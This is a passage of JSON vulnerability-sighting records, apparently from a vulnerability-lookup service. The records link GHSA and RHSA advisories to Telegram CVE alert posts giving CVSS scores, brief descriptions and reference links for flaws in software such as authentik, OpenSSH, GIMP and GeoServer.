"https://t.me/DarkWebInformer_CVEAlerts/19752", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52553\n\ud83d\udd25 CVSS Score: 5.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: authentik is an open-source identity provider. After authorizing access to a RAC endpoint, authentik creates a token which is used for a single connection and is sent to the client in the URL. This token is intended to only be valid for the session of the user who authorized the connection, however this check is missing in versions prior to 2025.6.3 and 2025.4.3. When, for example, using RAC during a screenshare, a malicious user could access the same session by copying the URL from the shown browser. authentik 2025.4.3 and 2025.6.3 fix this issue. As a workaround, it is recommended to decrease the duration a token is valid for (in the RAC Provider settings, set Connection expiry to `minutes=5` for example). The maintainers of authentik also recommend enabling the option Delete authorization on disconnect.\n\ud83d\udccf Published: 2025-06-27T15:03:13.015Z\n\ud83d\udccf Modified: 2025-06-27T15:50:17.417Z\n\ud83d\udd17 References:\n1. https://github.com/goauthentik/authentik/security/advisories/GHSA-wr3v-9p2c-chx7\n2. https://github.com/goauthentik/authentik/commit/0e07414e9739b318cff9401a413a5fe849545325\n3. https://github.com/goauthentik/authentik/commit/65373ab21711d58147b5cb9276c5b5876baaa5eb\n4. https://github.com/goauthentik/authentik/commit/7100d3c6741853f1cfe3ea2073ba01823ab55caa", "creation_timestamp": "2025-06-27T16:57:34.000000Z"}, {"uuid": "c31040aa-8e8e-495e-9290-da10ab98e43e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9RPW-2H95-666C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17015", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-2529\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: sflow decode package does not employ sufficient packet sanitisation which can lead to a denial of service attack. Attackers can craft malformed packets causing the process to consume large amounts of memory resulting in a denial of service.\n\ud83d\udccf Published: 2022-09-30T10:45:11.000Z\n\ud83d\udccf Modified: 2025-05-20T16:03:07.474Z\n\ud83d\udd17 References:\n1. https://github.com/cloudflare/goflow/security/advisories/GHSA-9rpw-2h95-666c", "creation_timestamp": "2025-05-20T16:41:08.000000Z"}, {"uuid": "efee6a12-5c79-4d42-ae72-7f9188b2b18e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2QP5-C2VQ-G2WW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19310", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2962\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A denial-of-service issue in the dns implemenation could cause an infinite loop.\n\ud83d\udccf Published: 2025-06-24T05:32:11.287Z\n\ud83d\udccf Modified: 2025-06-24T05:32:11.287Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-2qp5-c2vq-g2ww", "creation_timestamp": "2025-06-24T05:49:01.000000Z"}, {"uuid": "5bdab91e-4384-4792-84d9-fa33b2baeb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q6MM-CM37-W637", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17159", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46822\n\ud83d\udd25 CVSS Score: 7.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-21T17:23:37.087Z\n\ud83d\udccf Modified: 2025-05-21T17:23:37.087Z\n\ud83d\udd17 References:\n1. https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637\n2. https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2", "creation_timestamp": "2025-05-21T17:43:13.000000Z"}, {"uuid": "e62f9622-579f-4a8b-9fdc-ab8ce4c26067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X8G-6RV5-MGG2", "type": "seen", "source": "Telegram/GfeUhnyJYShCjvs7rm1XQAQJnKqowYjnl2h2DVxLAV4-eNA", "content": "", "creation_timestamp": "2026-04-20T17:20:51.000000Z"}, {"uuid": "1ada1322-3201-4b91-8eb4-4d49d9c42312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1954", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17186", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1801\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in the Ansible aap-gateway. Concurrent requests handled by the gateway grpc service can result in concurrency issues due to race condition requests against the proxy. This issue potentially allows a less privileged user to obtain the JWT of a greater privileged user, enabling the server to be jeopardized. A user session or confidential data might be vulnerable.\n\ud83d\udccf Published: 2025-03-03T15:03:15.439Z\n\ud83d\udccf Modified: 2025-05-21T19:15:20.949Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1954\n2. https://access.redhat.com/security/cve/CVE-2025-1801\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2349081", "creation_timestamp": "2025-05-21T19:42:58.000000Z"}, {"uuid": "4c261891-0ca1-48c5-a0d2-63c72cc30fda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859R-VVV8-RM8R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17210", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47947\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. Versions up to and including 2.9.8 are vulnerable to denial of service in one special case (in stable released versions): when the payload's content type is `application/json`, and there is at least one rule which does a `sanitiseMatchedBytes` action. A patch is available at pull request 3389 and expected to be part of version 2.9.9. No known workarounds are available.\n\ud83d\udccf Published: 2025-05-21T22:08:31.982Z\n\ud83d\udccf Modified: 2025-05-21T22:08:31.982Z\n\ud83d\udd17 References:\n1. https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-859r-vvv8-rm8r\n2. https://github.com/owasp-modsecurity/ModSecurity/pull/3389", "creation_timestamp": "2025-05-21T22:41:54.000000Z"}, {"uuid": "4499c952-eeaf-4e38-a615-9e0aec78d28a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJH4-Q763-CC48", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17209", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48070\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Plane is open-source project management software. Versions prior to 0.23 have insecure permissions in UserSerializer that allows users to change fields that are meant to be read-only, such as email. This can lead to account takeover when chained with another vulnerability such as cross-site scripting (XSS). Version 0.23 fixes the issue.\n\ud83d\udccf Published: 2025-05-21T22:11:06.177Z\n\ud83d\udccf Modified: 2025-05-21T22:11:06.177Z\n\ud83d\udd17 References:\n1. https://github.com/makeplane/plane/security/advisories/GHSA-cjh4-q763-cc48\n2. https://github.com/makeplane/plane/commit/0a8cc24da505fd519fcc3c9d6b5e15bc7ce21b29", "creation_timestamp": "2025-05-21T22:41:53.000000Z"}, {"uuid": "3cdcfd2c-910f-4f17-835b-c6d6560e0c83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M9J7-JW3M-FR22", "type": "seen", "source": "Telegram/GfeUhnyJYShCjvs7rm1XQAQJnKqowYjnl2h2DVxLAV4-eNA", "content": "", "creation_timestamp": "2026-04-20T17:20:51.000000Z"}, {"uuid": "619225c2-a508-412d-85eb-b044319b6dec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R6M-QJWM-W44Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17337", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48061\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: wire-webapp is the web application for the open-source messaging service Wire. A change caused a regression resulting in sessions not being properly invalidated. A user that logged out of the Wire webapp, could have been automatically logged in again after re-opening the application. This does not happen when the user is logged in as a temporary user by selecting \"This is a public computer\" during login or the user selects \"Delete all your personal information and conversations on this device\" upon logout. The underlying issue has been fixed with wire-webapp version 2025-05-20-production.0. As a workaround, this behavior can be prevented by either deleting all information upon logout as well as logging in as a temporary client.\n\ud83d\udccf Published: 2025-05-22T17:04:42.918Z\n\ud83d\udccf Modified: 2025-05-22T17:32:16.333Z\n\ud83d\udd17 References:\n1. https://github.com/wireapp/wire-webapp/security/advisories/GHSA-7r6m-qjwm-w44q", "creation_timestamp": "2025-05-22T17:43:38.000000Z"}, {"uuid": "338bbf52-785c-4e03-aa48-ec21062ee5e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFC2-9QMW-W7VH", "type": "published-proof-of-concept", "source": "Telegram/Ww620GgPpyXrrMPbpNwPksYQUctI-RNYBJr_VLxtJIutZ-I", "content": "", "creation_timestamp": "2026-04-21T01:18:26.000000Z"}, {"uuid": "7f19786a-5ac6-423b-93d8-ae8745db76d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8RH7-6779-CJQQ", "type": "published-proof-of-concept", "source": "Telegram/Ww620GgPpyXrrMPbpNwPksYQUctI-RNYBJr_VLxtJIutZ-I", "content": "", "creation_timestamp": "2026-04-21T01:18:26.000000Z"}, {"uuid": "c2e7b8cc-d526-43da-890b-ac41fac2c1ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6RX-7PVW-2F73", "type": "published-proof-of-concept", "source": "Telegram/Ww620GgPpyXrrMPbpNwPksYQUctI-RNYBJr_VLxtJIutZ-I", "content": "", "creation_timestamp": "2026-04-21T01:18:26.000000Z"}, {"uuid": "06ab2b8b-2e91-4683-877e-07a00582a2ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5PQ-48MJ-JVW8", "type": "published-proof-of-concept", "source": "Telegram/Ww620GgPpyXrrMPbpNwPksYQUctI-RNYBJr_VLxtJIutZ-I", "content": "", "creation_timestamp": "2026-04-21T01:18:26.000000Z"}, {"uuid": "fdbc5e02-94ec-41e7-8011-77d2dacf322c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6XG4-82HV-CP6F", "type": "seen", "source": "Telegram/wz0kiY1tb5u805P38ZVeawoTKuvhTd24bOWQm-Bt9SZek-4", "content": "", "creation_timestamp": "2026-04-21T01:18:48.000000Z"}, {"uuid": "ae33e3a3-12d7-4717-94c4-5749d9e15931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJX8-8P7H-82GR", "type": "seen", "source": "Telegram/wz0kiY1tb5u805P38ZVeawoTKuvhTd24bOWQm-Bt9SZek-4", "content": "", "creation_timestamp": "2026-04-21T01:18:48.000000Z"}, {"uuid": "99f30328-9a25-43ba-93cc-b50362d936eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q7V-8MR7-G23P", "type": "seen", "source": "Telegram/wz0kiY1tb5u805P38ZVeawoTKuvhTd24bOWQm-Bt9SZek-4", "content": "", "creation_timestamp": "2026-04-21T01:18:48.000000Z"}, {"uuid": "418d99ce-488a-447e-a09a-e23ffb8382ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2QRV-RC5X-2G2H", "type": "seen", "source": "Telegram/wz0kiY1tb5u805P38ZVeawoTKuvhTd24bOWQm-Bt9SZek-4", "content": "", "creation_timestamp": "2026-04-21T01:18:48.000000Z"}, {"uuid": "c1012171-0017-4c15-98d7-e6597deb48f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5CG-8X5W-7JPM", "type": "published-proof-of-concept", "source": "Telegram/LrBuhuc7HcH3kswc1a1az3fvuC6rURNPubqOsu4a3yYkj38", "content": "", "creation_timestamp": "2026-04-21T01:19:10.000000Z"}, {"uuid": "8eed9d29-4f41-452b-813f-3677d5e76d5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98HH-7GHG-X6RQ", "type": "published-proof-of-concept", "source": "Telegram/LrBuhuc7HcH3kswc1a1az3fvuC6rURNPubqOsu4a3yYkj38", "content": "", "creation_timestamp": "2026-04-21T01:19:10.000000Z"}, {"uuid": "f6525d43-ecdc-42ad-90d9-67f92f4924db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8126", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17535", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-4948\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the soup_multipart_new_from_message() function of the libsoup HTTP library, which is commonly used by GNOME and other applications to handle web communications. The issue occurs when the library processes specially crafted multipart messages. Due to improper validation, an internal calculation can go wrong, leading to an integer underflow. This can cause the program to access invalid memory and crash. As a result, any application or server using libsoup could be forced to exit unexpectedly, creating a denial-of-service (DoS) risk.\n\ud83d\udccf Published: 2025-05-19T15:55:46.230Z\n\ud83d\udccf Modified: 2025-05-26T06:46:35.926Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:8126\n2. https://access.redhat.com/security/cve/CVE-2025-4948\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2367183", "creation_timestamp": "2025-05-26T07:46:55.000000Z"}, {"uuid": "ecc31fff-91be-49cc-8fc5-3df2df2e7b47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VP62-R36R-9XQP", "type": "seen", "source": "Telegram/QlBPoNymR9hPCPyX2NtJM9uRRriKED-kqAlb1qrMP0xHygk", "content": "", "creation_timestamp": "2026-04-21T03:18:04.000000Z"}, {"uuid": "05732d5e-7113-4309-8000-b5b7d92caf22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GW9-C2R2-F5QF", "type": "seen", "source": "Telegram/QlBPoNymR9hPCPyX2NtJM9uRRriKED-kqAlb1qrMP0xHygk", "content": "", "creation_timestamp": "2026-04-21T03:18:04.000000Z"}, {"uuid": "80c8ae8c-5742-405d-ac2b-99edfc9bb452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-675F-RQ2R-JW82", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17474", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22149\n\ud83d\udd25 CVSS Score: 2.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N)\n\ud83d\udd39 Description: JWK Set (JSON Web Key Set) is a JWK and JWK Set Go implementation. Prior to 0.6.0, the project's provided HTTP client's local JWK Set cache should do a full replacement when the goroutine refreshes the remote JWK Set. The current behavior is to overwrite or append. This is a security issue for use cases that utilize the provided auto-caching HTTP client and where key removal from a JWK Set is equivalent to revocation. The affected auto-caching HTTP client was added in version v0.5.0 and fixed in v0.6.0. The only workaround would be to remove the provided auto-caching HTTP client and replace it with a custom implementation. This involves setting the HTTPClientStorageOptions.RefreshInterval to zero (or not specifying the value).\n\ud83d\udccf Published: 2025-01-09T17:22:59.757Z\n\ud83d\udccf Modified: 2025-05-23T19:56:35.937Z\n\ud83d\udd17 References:\n1. https://github.com/MicahParks/jwkset/security/advisories/GHSA-675f-rq2r-jw82\n2. https://github.com/MicahParks/jwkset/issues/40\n3. https://github.com/MicahParks/jwkset/commit/01db49a90f7f20c7fb39a699a2f19a7a5f379ed3", "creation_timestamp": "2025-05-23T20:49:57.000000Z"}, {"uuid": "d14dd3c7-6518-42b2-b43a-431b824bfd77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9165", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48797\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in GIMP when processing certain TGA image files. If a user opens one of these image files that has been specially crafted by an attacker, GIMP can be tricked into making serious memory errors, potentially leading to crashes and causing a heap buffer overflow.\n\ud83d\udccf Published: 2025-05-27T14:04:57.389Z\n\ud83d\udccf Modified: 2025-06-17T09:16:10.927Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9162\n2. https://access.redhat.com/errata/RHSA-2025:9165\n3. https://access.redhat.com/security/cve/CVE-2025-48797\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2368558", "creation_timestamp": "2025-06-17T09:41:29.000000Z"}, {"uuid": "ab4124e1-227e-49ca-a8fb-0de204c6b2d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2P76-GC46-5FVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17910", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30220\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: GeoServer is an open source server that allows users to share and edit geospatial data. GeoTools Schema class use of Eclipse XSD library to represent schema data structure is vulnerable to XML External Entity (XXE) exploit. This impacts whoever exposes XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of gt-wfs-ng DataStore where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.\n\ud83d\udccf Published: 2025-06-10T15:16:39.339Z\n\ud83d\udccf Modified: 2025-06-10T15:16:39.339Z\n\ud83d\udd17 References:\n1. https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc\n2. https://github.com/geonetwork/core-geonetwork/security/advisories/GHSA-2p76-gc46-5fvc\n3. https://github.com/geotools/geotools/security/advisories/GHSA-826p-4gcg-35vw\n4. https://github.com/geonetwork/core-geonetwork/pull/8757\n5. https://github.com/geonetwork/core-geonetwork/pull/8803\n6. https://github.com/geonetwork/core-geonetwork/pull/8812\n7. https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities", "creation_timestamp": "2025-06-10T15:31:13.000000Z"}, {"uuid": "4f4cb65c-7f2a-481d-a495-cc88c85e436c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C49J-QVP9-VGG6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17338", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48368\n\ud83d\udd25 CVSS Score: 5.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P)\n\ud83d\udd39 Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a DOM-based Cross-Site Scripting (XSS) vulnerability exists in the GroupOffice application, allowing attackers to execute arbitrary JavaScript code in the context of the victim's browser. This can lead to session hijacking, defacement, or redirection to malicious sites. The vulnerability can be triggered by injecting a crafted payload into a parameter that is later processed unsafely in the DOM. Versions 6.8.119 and 25.0.20 contain a fix for the issue.\n\ud83d\udccf Published: 2025-05-22T17:29:57.631Z\n\ud83d\udccf Modified: 2025-05-22T17:31:21.007Z\n\ud83d\udd17 References:\n1. https://github.com/Intermesh/groupoffice/security/advisories/GHSA-c49j-qvp9-vgg6", "creation_timestamp": "2025-05-22T17:43:38.000000Z"}, {"uuid": "b815abc6-7ba4-4c77-9ddb-16a961583e1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HX6P-XPX3-JVVV", "type": "published-proof-of-concept", "source": "Telegram/lEx4szWN0qGJp6nrTUnjGPs2FeG4zgfzAhM3YBb6L1MKYlY", "content": "", "creation_timestamp": "2026-04-20T19:17:56.000000Z"}, {"uuid": "389683b6-ef75-4b95-80d8-fcc54c3b0121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C72G-53HW-82Q7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17362", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48371\n\ud83d\udd25 CVSS Score: 5.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: OpenFGA is an authorization/permission engine. OpenFGA versions 1.8.0 through 1.8.12 (corresponding to Helm chart openfga-0.2.16 through openfga-0.2.30 and docker 1.8.0 through 1.8.12) are vulnerable to authorization bypass when certain Check and ListObject calls are executed. Users are affected under four specific conditions: First, calling Check API or ListObjects with an authorization model that has a relationship directly assignable by both type bound public access and userset; second, there are check or list object queries with contextual tuples for the relationship that can be directly assignable by both type bound public access and userset; third, those contextual tuples\u2019s user field is an userset; and finally, type bound public access tuples are not assigned to the relationship. Users should upgrade to version 1.8.13 to receive a patch. The upgrade is backwards compatible.\n\ud83d\udccf Published: 2025-05-22T22:20:37.570Z\n\ud83d\udccf Modified: 2025-05-22T22:20:37.570Z\n\ud83d\udd17 References:\n1. https://github.com/openfga/openfga/security/advisories/GHSA-c72g-53hw-82q7\n2. https://github.com/openfga/openfga/commit/e5960d4eba92b723de8ff3a5346a07f50c1379ca", "creation_timestamp": "2025-05-22T22:50:46.000000Z"}, {"uuid": "4ff04134-95ca-4081-9e32-5ceb07fc70dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C48-67XX-VQGC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17361", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48372\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Schule is open-source school management system software. The generateOTP() function generates a 4-digit numeric One-Time Password (OTP). Prior to version 1.0.1, even if a secure random number generator is used, the short length and limited range (1000\u20139999) results in only 9000 possible combinations. This small keyspace makes the OTP highly vulnerable to brute-force attacks, especially in the absence of strong rate-limiting or lockout mechanisms. Version 1.0.1 fixes the issue.\n\ud83d\udccf Published: 2025-05-22T20:38:02.463Z\n\ud83d\udccf Modified: 2025-05-22T20:38:02.463Z\n\ud83d\udd17 References:\n1. https://github.com/schule111/Schule/security/advisories/GHSA-6c48-67xx-vqgc\n2. https://github.com/schule111/Schule/commit/cd53abbea93943f2c60a5281d45bebadc57636b7", "creation_timestamp": "2025-05-22T21:38:31.000000Z"}, {"uuid": "1ff35ce5-a3cb-401b-ab97-afe829589725", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q49F-XG75-M9XW", "type": "published-proof-of-concept", "source": "Telegram/lEx4szWN0qGJp6nrTUnjGPs2FeG4zgfzAhM3YBb6L1MKYlY", "content": "", "creation_timestamp": "2026-04-20T19:17:56.000000Z"}, {"uuid": "9dec352d-8729-4a96-8b30-0d62b16e3c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4716", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6409\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A race condition vulnerability was discovered in how signals are handled by OpenSSH's server (sshd). If a remote attacker does not authenticate within a set time period, then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.\n\ud83d\udccf Published: 2024-07-08T17:57:10.517Z\n\ud83d\udccf Modified: 2025-05-22T19:17:16.728Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4457\n2. https://access.redhat.com/errata/RHSA-2024:4613\n3. https://access.redhat.com/errata/RHSA-2024:4716\n4. 